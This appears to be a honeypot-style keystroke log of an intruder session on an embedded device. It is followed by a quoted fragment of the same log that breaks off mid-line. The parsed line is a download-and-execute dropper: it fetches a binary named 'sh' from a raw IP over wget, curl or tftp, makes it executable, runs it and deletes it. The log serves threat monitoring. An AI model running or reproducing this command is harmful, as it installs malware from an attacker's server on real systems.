2024-11-03 11:09:34.276 [Keystroke] s - 115
2024-11-03 11:09:34.276 [Keystroke] h - 104
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] | - 124
2024-11-03 11:09:34.276 [Keystroke] | - 124
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] t - 116
2024-11-03 11:09:34.276 [Keystroke] f - 102
2024-11-03 11:09:34.276 [Keystroke] t - 116
2024-11-03 11:09:34.276 [Keystroke] p - 112
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] - - 45
2024-11-03 11:09:34.276 [Keystroke] g - 103
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] - - 45
2024-11-03 11:09:34.276 [Keystroke] r - 114
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] s - 115
2024-11-03 11:09:34.276 [Keystroke] h - 104
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] 9 - 57
2024-11-03 11:09:34.276 [Keystroke] 3 - 51
2024-11-03 11:09:34.276 [Keystroke] . - 46
2024-11-03 11:09:34.276 [Keystroke] 1 - 49
2024-11-03 11:09:34.276 [Keystroke] 2 - 50
2024-11-03 11:09:34.276 [Keystroke] 3 - 51
2024-11-03 11:09:34.276 [Keystroke] . - 46
2024-11-03 11:09:34.276 [Keystroke] 1 - 49
2024-11-03 11:09:34.276 [Keystroke] 0 - 48
2024-11-03 11:09:34.276 [Keystroke] 9 - 57
2024-11-03 11:09:34.276 [Keystroke] . - 46
2024-11-03 11:09:34.276 [Keystroke] 1 - 49
2024-11-03 11:09:34.276 [Keystroke] 7 - 55
2024-11-03 11:09:34.276 [Keystroke] 0 - 48
2024-11-03 11:09:34.276 [Keystroke] ; - 59
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] c - 99
2024-11-03 11:09:34.276 [Keystroke] h - 104
2024-11-03 11:09:34.276 [Keystroke] m - 109
2024-11-03 11:09:34.276 [Keystroke] o - 111
2024-11-03 11:09:34.276 [Keystroke] d - 100
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] 7 - 55
2024-11-03 11:09:34.276 [Keystroke] 7 - 55
2024-11-03 11:09:34.276 [Keystroke] 7 - 55
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] s - 115
2024-11-03 11:09:34.276 [Keystroke] h - 104
2024-11-03 11:09:34.276 [Keystroke] ; - 59
2024-11-03 11:09:34.276 [Keystroke] . - 46
2024-11-03 11:09:34.276 [Keystroke] / - 47
2024-11-03 11:09:34.276 [Keystroke] s - 115
2024-11-03 11:09:34.276 [Keystroke] h - 104
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] s - 115
2024-11-03 11:09:34.276 [Keystroke] s - 115
2024-11-03 11:09:34.276 [Keystroke] h - 104
2024-11-03 11:09:34.276 [Keystroke] ; - 59
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] r - 114
2024-11-03 11:09:34.276 [Keystroke] m - 109
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] - - 45
2024-11-03 11:09:34.276 [Keystroke] r - 114
2024-11-03 11:09:34.276 [Keystroke] f - 102
2024-11-03 11:09:34.276 [Keystroke] [Space] - 32
2024-11-03 11:09:34.276 [Keystroke] s - 115
2024-11-03 11:09:34.276 [Keystroke] h - 104
2024-11-03 11:09:34.276 [Keystroke] [LF] - 10
2024-11-03 11:09:34.303 [Full Line Parsed] rm -rf sh; wget http://93.123.109.170/sh || curl -O http://93.123.109.170/sh || tftp 93.123.109.170 -c get sh || tftp -g -r sh 93.123.109.170; chmod 777 sh;./sh ssh; rm -rf sh
'''

'\n2024-11-03 11:09:33.938 [Keystroke] e - 101\n2024-11-03 11:09:33.938 [Keystroke] n - 110\n2024-11-03 11:09:33.938 [Keystroke] a - 97\n2024-11-03 11:09:33.938 [Keystroke] b - 98\n2024-11-03 11:09:33.938 [Keystroke] l - 108\n2024-11-03 11:09:33.938 [Keystroke] e - 101\n2024-11-03 11:09:33.938 [Keystroke] [LF] - 10\n2024-11-03 11:09:33.941 [Full Line Parsed] enable\n2024-11-03 11:09:34.055 [Keystroke] s - 115\n2024-11-03 11:09:34.055 [Keystroke] y - 121\n2024-11-03 11:09:34.055 [Keystroke] s - 115\n2024-11-03 11:09:34.055 [Keystroke] t - 116\n2024-11-03 11:09:34.055 [Keystroke] e - 101\n2024-11-03 11:09:34.055 [Keystroke] m - 109\n2024-11-03 11:09:34.055 [Keystroke] [LF] - 10\n2024-11-03 11:09:34.057 [Full Line Parsed] system\n2024-11-03 11:09:34.059 [Keystroke] s - 115\n2024-11-03 11:09:34.059 [Keystroke] h - 104\n2024-11-03 11:09:34.059 [Keystroke] e - 101\n2024-11-03 11:09:34.059 [Keystroke] l - 108\n2024-11-03 11:09:34.059 [Keystroke] l - 108\n2024-11-03 11:09:34.059 [Keystroke] [L